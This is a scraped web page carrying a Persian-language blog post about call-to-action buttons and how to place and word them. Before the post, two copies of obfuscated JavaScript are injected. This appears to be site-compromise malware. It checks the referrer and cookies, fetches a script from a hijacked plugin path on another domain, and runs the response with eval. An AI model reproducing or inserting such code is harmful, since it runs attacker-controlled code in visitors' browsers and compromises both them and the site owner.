;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} ;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//soloweb.ir/wp-content/plugins/RTL-CareUnit/vendor/defuse/php-encryption/src/Exception/Exception.js","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

فراخوانی به فعالیت: چرا هر کسب و کاری موفقیت آمیز باید داشته باشد

اگر وب سایت خود را دارید ، احتمالاً شما در حال شنیدن داستان ها و خواندن پست های وبلاگ در مورد آن تماس برای اقدام هستید. این دقیقا چیست و چرا اینقدر مهم است؟ فراخوان عمل ، یا CTA کوتاه تر ، اصطلاح بازاریابی است که در دنیای تجارت محبوبیت پیدا کرد. احتمالاً دکمه های رنگارنگ مختلفی را در وبسایت های بی شماری با متن اجباری مانند “اکنون بخرید” ، “بیشتر بیاموزید” ، “امروز سفارش دهید” ، “اکنون درخواست کنید” را مشاهده کردید. آنها غالباً به شکل دکمه هایی هستند که از شما دعوت می کنند روی آنها کلیک کنید ، اما به عنوان آگهی ها و لینک های ساده نیز حضور دارند.

کار آنها الهام بخشیدن به مردم است که قدم بعدی را در وب سایت بردارند. بعد از اتمام خواندن پست وبلاگ ، در زیر معمولاً می توانید CTA را پیدا کنید که به شما امکان بارگیری کتاب الکترونیکی رایگان را در مورد موضوعی که فقط در مورد آن خوانده اید ارائه می دهد. یا ممکن است به شما پیشنهاد دهد برای دریافت خبرنامه وبلاگ ثبت نام کنید.

فراخوان برای اقدام بخشی اجتناب ناپذیر از صفحات فروش است. متن (همچنین به عنوان کپی) در این صفحات نیز نقش بزرگی ایفا می کند. هدف متقابل آنها متقاعد کردن خریداران بالقوه است که از آنجا که محصولی یا خدماتی را ارائه می دهید که دقیقاً برای آنها باشد ، اقدامی انجام دهند. این محصول یا خدمات چیزی است که آنها حتی نمی دانستند به آن احتیاج داشته باشند ، اما اکنون آنها آنقدر به آن احتیاج دارند که می خواهند فوراً با شما تماس بگیرند. این سناریوی ایده آل است که چگونه نسخه کپی و فراخوان خوب باید کار کند. البته واقعیت خیلی دور از آن نیست ، اما روش هایی وجود دارد که چگونه می توانید چیزی بیشتر از دکمه CTA خود تهیه کنید

نکات اصلی فراخوان عمل
• هنگامی که به وب سایت خود در مورد تماس های عملی فکر می کنید ، باید توجه کنید:
• تماس عمل در کجا قرار دارد.
• چگونه به نظر می رسد (این یک دکمه ، تصویر ، بنر ، پیوند …) است.
• کدام متن بر روی آن قرار دارد ، بلکه کدام متن بالاتر از آن است.
این که آیا شما می خواهید CTA را در انتهای مقاله یا در کنار آن قرار دهید ، به میزان محتوایی که در آن صفحه قرار دارد بستگی زیادی دارد. در صورت وجود یک فروشگاه آنلاین ، بهتر است CTA را در زیر هر محصولی که عرضه می کنید داشته باشید.
در صورت ارسال پست وبلاگ ، تماس با اقدام معمولاً در زیر متن قرار می گیرد. آیا می خواهید بازدید کنندگان شما نمایه ای را در وب سایت خود ایجاد کنند؟ سعی کنید فرم ثبت نام را در کنار آن قرار دهید و مطمئن شوید که به اندازه کافی قابل مشاهده است.
هنگامی که به نظر می رسد ، اطمینان حاصل کنید که تماس های شما برای اقدام قابل توجه است. اطمینان حاصل کنید که دکمه از رنگ پر جنب و جوش است ، اما در همان زمان با بقیه صفحه هماهنگ است – بدون اینکه در بالای صفحه قرار بگیرید ، توجه را به خود جلب کنید.
هنگام صحبت از CTA خلاق باشید. یک دکمه را به روشی خاص طراحی کنید ، پیوند را در داخل بنر قرار دهید که به شکلی برای جذب بازدید کننده نیز طراحی خواهد شد. فقط مهم است که مشخص است که در آن باید کلیک کنید. این باید با سلیقه طراحی شود و نباید مانند تبلیغات پرداخت شده شخص دیگری باشد.

متن بستگی به عملی دارد که شما می خواهید بازدید کنندگان خود را انجام دهند. حتماً واضح و مختصر باشید. می توانید چیزی بنویسید که متفاوت از پیام های استاندارد مانند “اکنون سفارش دهید” ، “ثبت نام” ، “امروز تماس بگیرید”. چیز جدیدی را امتحان کنید تا بتوانید با رقابت خود فرق کنید.

نکاتی برای تماس های شما برای انجام عمل
این یک خط نازک بین داشتن CTA خیلی کم یا خیلی زیاد است. دکمه ها یا آگهی های بیش از حد را در یک صفحه قرار ندهید زیرا بازدید کنندگان نمی دانند چه چیزی از آنها انتظار می رود. آنها را می توان با اطلاعات بیش از حد غرق کرد. در چنین شرایطی ، مردم احتمالاً وب سایت شما را ترک می کنند. و این چیزی است که شما نمی خواهید.

مقاله های بیشتر

طراحی وب

فریم ورک چیست ؟

فریم ورک FrameWork که در اصطلاح یک چارچوب نرم افزاری گفته می شود مجموعه ای است از کتابخانه های برنامه نویسی و احتمالا مجموعه ای